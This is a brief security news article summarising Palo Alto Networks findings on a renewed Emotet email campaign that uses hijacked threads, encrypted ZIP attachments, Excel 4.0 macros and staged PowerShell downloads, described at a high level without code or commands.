The notorious Emotet is active again with new tactics to spread and deliver the malware. A new email campaign is using macro-laden Excel files and various layers of obfuscation.
The new infection tactic
Palo Alto Networks has observed that the new Emotet infection tactic uses multiple stages including different file types of, and obfuscated, scripts before delivering the payload.
- When activated, the macro downloads and runs an HTML app which further downloads two stages of PowerShell for obtaining and executing the final payload.
- The attackers have been delivering an Excel file with an obfuscated Excel 4.0 macro via socially engineered emails since December 2021.
Attack variants
According to researchers, the recent Emotet infection has several variations for spreading malicious Excel documents.
- In some of the cases, Emotet uses a password-protected .ZIP archive attached to an email.
- In a few other cases, it was observed using an Excel spreadsheet directly attached to the email.
Additional details
For this campaign, attackers have used email thread hijacking and some other attack tactics.
- An email sent by the Emotet botnet on January 27 used a stolen email thread from June 2021.
- In this case, the email used a lure that included an encrypted .ZIP file to avoid security systems or solutions, and a password to the .ZIP file for the victim to extract the contents.
- The encrypted .ZIP file contained a single Excel document laden with Excel 4.0 macros.
- Once the macro is executed, a remote HTML app is run to download and execute additional PowerShell code. The code retrieves second-stage PowerShell code to obtain the Emotet binary.
The bottom line
Emotet is a prominent threat, known for regularly updating its infection and delivery tactics to avoid security solutions. Frequent updates in its delivery and evasion tactics indicate that its operators are investing ample time and resources to improve its effectiveness against security defenses.
Publisher
/https://cyware-ent.s3.amazonaws.com/image_bank/iStock-512277926.jpg)
/https://cyware-ent.s3.amazonaws.com/image_bank/iStock_48548024_SMALL.jpg)
